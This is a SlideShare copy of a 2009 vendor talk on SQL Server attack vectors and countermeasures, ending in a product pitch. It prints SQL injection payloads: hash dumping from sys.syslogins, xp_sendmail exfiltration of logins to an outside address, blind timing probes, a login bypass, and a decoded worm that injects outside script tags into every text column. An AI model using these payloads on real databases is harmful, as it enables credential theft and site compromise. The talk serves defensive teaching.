Think like a hacker
DB attack vectors, Thwarting techniques




                                        Presented to the
 ...
What’s This Presentation All About?


  Is there an enemy ?
  Common Database Hacking Techniques
  Raising the bar for the...
Why Protect The Database?

  Databases hold sensitive information – and lots of it:
       Customer data, accounts, transa...
Some Recent Examples

  July 2005 – January 2007: TJX
       45.7M+ credit/debit card records stolen
   •

       Sophisti...
Know Your Enemy

 Unauthorized access - not just hackers
      Too many privileges
  •

 Internal attacks
      Disgruntle...
The Problems

  Does a hacker need DBA access?
  Myriad of privileges
      System level, Application level, Data access
 ...
The Problems

  Most typical problems of real world databases
      Weak / default passwords for database accounts
  •
   ...
Basic Hacking Techniques




presented by Sudha Iyer | Apr 8, 2009
Discovering databases

Reconnaissance: nmap - http://nmap.org/
   SQLPing3 - http://sqlsecurity.com/




                 ...
Is password the weakest link?

    Many brute force tools out there
•




                     © Copyright LogLogic Inc.  ...
Powerful Tools Are Easily Available




                © Copyright LogLogic Inc.   |   Thursday, April 09, 2009   Page 11
Social Engineering

  Wait for your DBA to go for a coffee break
  Go to his desktop
  Open Management Studio
  Add yourse...
SQL Injection

  Wikipedia –
       is a technique that exploits a security vulnerability occurring in
   •
       the dat...
SQL Injection

  Exists in any layer of any application
       Web Applications
   •
       Stored program units
   •
    ...
SQL Injection Types

  In band – Use injection to return extra data
      Part of normal result set (unions)
  •
      In ...
SQL Injection In-band

select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1;
select name, password fr...
SQL Injection In-Band

Using errors – inject the following:
1 and 1 in (select @@version)
Result is:
Msg 245, Level 16, St...
SQL Injection Out-of-band

Send information via HTTP/SMTP/DNS to an external site:


select * from AdventureWorks.HumanRes...
Blind SQL Injection

Example code:
If is_srvrolemember('sysdamin') > 0) waitfor delay '0:0:5'


If (ascii(substring(@strin...
SQL Injection – Web Application

  Username = ' or 1=1 --
   The original statement looked like:
   'select * from users w...
Real World Example

  Mass SQL worm in the wild since April
  Enumerates all query/input fields and tries various SQL
  in...
Real World Example

SELECT * FROM dbo.xxx WHERE yyy=1;DECLARE @S VARCHAR(4000);SET
    @S=CAST(0×4445434C41524520405420564...
Real World Example

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name
FROM syso...
Real World Example

   The interesting part is here:
’UPDATE ['SOME_TABLE'] SET
   ['SOME_TEXT_COL']=RTRIM(CONVERT(VARCHAR...
Thwarting these attacks




presented by Sudha Iyer | Apr 8, 2009
Try the off the shelf tools yourself

  Think like a hacker
       Learn about exploits
   •
       Always look for securi...
Develop an information security policy ...and enforce it


  Apply patch sets and upgrades
       Easier said than done
  ...
Secure By Default; Secure Coding Practices

    Install only what you use, remove all else
        Reduce your attack surf...
Publish Coding Standards, Peer Review

  Avoid hardcoding username/password
  Wrap sensitive/important program code – even...
Deploy Real Tools: Host-based Sensor Technology

              Host-based
                                                ...
Granular Policy-based Detection

   Security policies determined by granular rules:
           Predefined (Virtual Patchin...
LogLogic Database Security Manager

                                                     Meet Compliance Requirements
    ...
Integration with LogLogic Log Management Platform

     Database Security Manager                                         ...
Questions?




presented by Sudha Iyer | Apr 8, 2009
Upcoming SlideShare
Loading in …5
×

LogLogic SQL Server Hacking DBs April09

2,060 views

Published on

Sudha Iyer / LogLogic presentation: Think Like a Hacker: Database Attack Vectors and How to Thwart Them. Presentation to the San Francisco SQL Server User Group in April 2009.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
2,060
On SlideShare
0
From Embeds
0
Number of Embeds
3
Actions
Shares
0
Downloads
144
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

LogLogic SQL Server Hacking DBs April09

  1. 1. Think like a hacker DB attack vectors, Thwarting techniques Presented to the San Francisco SQL Server User Group presented by Sudha Iyer | Apr 8, 2009 www.BayAreaSQL.org Leader: Mark Ginnebaugh
  2. 2. What’s This Presentation All About? Is there an enemy ? Common Database Hacking Techniques Raising the bar for the hackers © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 2
  3. 3. Why Protect The Database? Databases hold sensitive information – and lots of it: Customer data, accounts, transactions, payroll, investor data • When a breach occurs, damage is significant: Direct damages and costs • Bad publicity • Regulatory penalties • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 3
  4. 4. Some Recent Examples July 2005 – January 2007: TJX 45.7M+ credit/debit card records stolen • Sophisticated attack (WiFi -> Internal Network -> DB) • Result: data sold to data brokers and used in many scams, TJX faces lawsuits and • losses of $25M until May 07 (will grow considerably) July 2007 – Fidelity National Information Services Bank and credit data of 2.3M customers - Stolen by a DBA • And many more breaches… not only in the U.S. (e.g. Home Office breach in the U.K.) Many breaches are unknown or not made public or remain undetected Over 216,686,736 identifiable records in US only - http://www.privacyrights.org/ar/ChronDataBreaches.htm © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 4
  5. 5. Know Your Enemy Unauthorized access - not just hackers Too many privileges • Internal attacks Disgruntled employees • Just trying to get the job done • Industrial espionage, Identity theft, etc. • Look around you!!! • External attacks Web or network access © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 5
  6. 6. The Problems Does a hacker need DBA access? Myriad of privileges System level, Application level, Data access • Any privilege in the right circumstances can be an issue • Other issues Network issues, incorrect configuration • Too many features – large attack surface • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 6
  7. 7. The Problems Most typical problems of real world databases Weak / default passwords for database accounts • Missing patches / patchsets – see • http://en.wikipedia.org/wiki/SQL_slammer_(computer_worm) Unsecure customer / 3rd party code (T-SQL stored • procedures) © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 7
  8. 8. Basic Hacking Techniques presented by Sudha Iyer | Apr 8, 2009
  9. 9. Discovering databases Reconnaissance: nmap - http://nmap.org/ SQLPing3 - http://sqlsecurity.com/ © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 9
  10. 10. Is password the weakest link? Many brute force tools out there • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 10
  11. 11. Powerful Tools Are Easily Available © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 11
  12. 12. Social Engineering Wait for your DBA to go for a coffee break Go to his desktop Open Management Studio Add yourself as an administrator to the database of your choice This can be easily scripted and put on a USB drive © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 12
  13. 13. SQL Injection Wikipedia – is a technique that exploits a security vulnerability occurring in • the database layer of an application. The vulnerability is present when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and thereby unexpectedly executed. © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 13
  14. 14. SQL Injection Exists in any layer of any application Web Applications • Stored program units • Build in User created Has many forms Extra queries, unions, order by, sub selects • Easily avoided Bind variables, strong typing • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 14
  15. 15. SQL Injection Types In band – Use injection to return extra data Part of normal result set (unions) • In error messages • Out of band – Use alternative route like UTL_HTTP, DNS to extract data Blind / Inference – No data is returned but the hacker is able to infer the data using return codes, error codes, timing measurements and more © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 15
  16. 16. SQL Injection In-band select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; select name, password from sys.syslogins where password is not null 14417807 1209 adventure-worksguy1 16 Production Technician - WC60 1 1972-05-15 00:00:00.000 M M 1996-07-31 00:00:00.000 0 21 30 1 AAE1D04A-C237-4974-B4D5-935247737718 2004-07-31 00:00:00.000 虀뛎༷ 醜‫ﬥ‬ 绳 sa 2 쵌藌 街Ḷ왏�컕 test 3 Now, just attack the password hash using either using brute-force or dictionary. © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 16
  17. 17. SQL Injection In-Band Using errors – inject the following: 1 and 1 in (select @@version) Result is: Msg 245, Level 16, State 1, Line 1 Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3054.00 (Intel X86) Mar 23 2007 16:28:52 Copyright (c) 1988-2005 Microsoft Corporation Developer Edition on Windows NT 5.1 (Build 2600: Service Pack 2) ' to data type int. © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 17
  18. 18. SQL Injection Out-of-band Send information via HTTP/SMTP/DNS to an external site: select * from AdventureWorks.HumanResources.Employee where EmployeeID = 1; EXEC master.dbo.xp_sendmail @recipients=N'slavik@sentrigo.com', @query = N'select user, password from sys.syslogins where password is not null' ; © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 18
  19. 19. Blind SQL Injection Example code: If is_srvrolemember('sysdamin') > 0) waitfor delay '0:0:5' If (ascii(substring(@string, @byte, 1)) & (power(2, @bit))) > 0 waitfor '0:0:5' © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 19
  20. 20. SQL Injection – Web Application Username = ' or 1=1 -- The original statement looked like: 'select * from users where username = ''' + username + ''' and password = ''' + password + '''' The result = select * from users where username = '' or 1=1 --' and password = '' © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 20
  21. 21. Real World Example Mass SQL worm in the wild since April Enumerates all query/input fields and tries various SQL injection techniques Iterates on all text fields in the database and adds a link to the Jscript Result? Data Leakage … broad daylight! © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 21
  22. 22. Real World Example SELECT * FROM dbo.xxx WHERE yyy=1;DECLARE @S VARCHAR(4000);SET @S=CAST(0×4445434C415245204054205641524348415228323535292C4043205641524348415228323535292044454 34C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E61 6D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E6 96420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D33352 04F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F7 2204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C45284 04046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D2053455 4205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D2 9292B27273C736372697074207372633D687474703A2F2F7777772E616477626E722E636F6D2F622E6A733E3C2F736 3726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4 04320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F 7220 AS VARCHAR(4000)); EXEC (@S);-- ORDER BY ooo ASC Wow, how to read this? © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 22
  23. 23. Real World Example DECLARE @T VARCHAR(255),@C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype=’u’ AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN EXEC(’UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+”<script src=http://www.chkadw.com/b.js></script>”’) FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 23
  24. 24. Real World Example The interesting part is here: ’UPDATE ['SOME_TABLE'] SET ['SOME_TEXT_COL']=RTRIM(CONVERT(VARCHAR(4000), ['SOME_TEXT_COL']))+”<script src=http://www.chkadw.com/b.js></script>”’ Lesson Learned? Never use NoScript - even for trusted sites © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 24
  25. 25. Thwarting these attacks presented by Sudha Iyer | Apr 8, 2009
  26. 26. Try the off the shelf tools yourself Think like a hacker Learn about exploits • Always look for security issues • Configuration, permissions, bugs Learn and use available tools nmap, Metasploit, Wireshark, Hydra, Cryptool, SQLPing, etc. • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 26
  27. 27. Develop an information security policy ...and enforce it Apply patch sets and upgrades Easier said than done • Check for default and weak passwords regularly Secure the network Valid node checking + firewall • Use encryption • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 27
  28. 28. Secure By Default; Secure Coding Practices Install only what you use, remove all else Reduce your attack surface • The least privilege principle Lock down packages • System access, file access, network access Encrypt critical data Use secure coding techniques Bind variables, input validation • Clear ownership of security issues • http://checklists.nist.gov/chklst_detail.cfm?config_id=157 • © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 28
  29. 29. Publish Coding Standards, Peer Review Avoid hardcoding username/password Wrap sensitive/important program code – even if not really safe Use full qualified names for function and procedure calls Always validate user/database input Be careful with dynamic statements (Cursors, SQL-Statements, …) Be careful with file access Be careful with OS command execution © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 29
  30. 30. Deploy Real Tools: Host-based Sensor Technology Host-based All database transactions, Sensor externally or internally initiated, must go through the shared / cache memory Minimal impact on performance – typically less than 5% of a single CPU Stored DBMS Bequeath Proc Local Conn No business interruption (no Shared reboots or restarts) Trigger Memory Listener Supports SQL Server, Oracle, Network Conn Sybase View Data © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 30
  31. 31. Granular Policy-based Detection Security policies determined by granular rules: Predefined (Virtual Patching) – zero effort / Wizard-driven templates for • regulations / Administrator-defined Rule Policy Layers Virtual Patching Trigger Action Rule 1 1 Virtual Patching Trigger Action Rule Rule 2 2 Rule Compliance Templates IF Compliance Templates App<>’SAPFinance’ AND object = Rule 3 3 Rule ‘CC_Table’ THEN Community Best Practices Community Best Practices Send HIGH Alert Rule 4 4 Rule Send mail to: security team Terminate User Session Rule 5 5 Customer-Defined Rule Customer-Defined Quarantine User 60 minutes © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 31
  32. 32. LogLogic Database Security Manager Meet Compliance Requirements » Privileged user monitoring » Enforce Segregation of duties » Protect sensitive data » Audit trail and reporting » Keep database patches up to date » Compensating control for protecting » unencrypted data Complete Database Security » Protect against internal / external attacks » Cover all copies, locations and platforms » Operate in all environments (encryption, » clustering, virtualization) Defend against all types of attacks » “Always on” protection in real-time » © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 32
  33. 33. Integration with LogLogic Log Management Platform Database Security Manager LogLogic Open Log Management Granular policy-based detection Compliance reporting » » Automated database protection Long term archival » » Real-time virtual patching Forensics analysis » » © Copyright LogLogic Inc. | Thursday, April 09, 2009 Page 33
  34. 34. Questions? presented by Sudha Iyer | Apr 8, 2009

×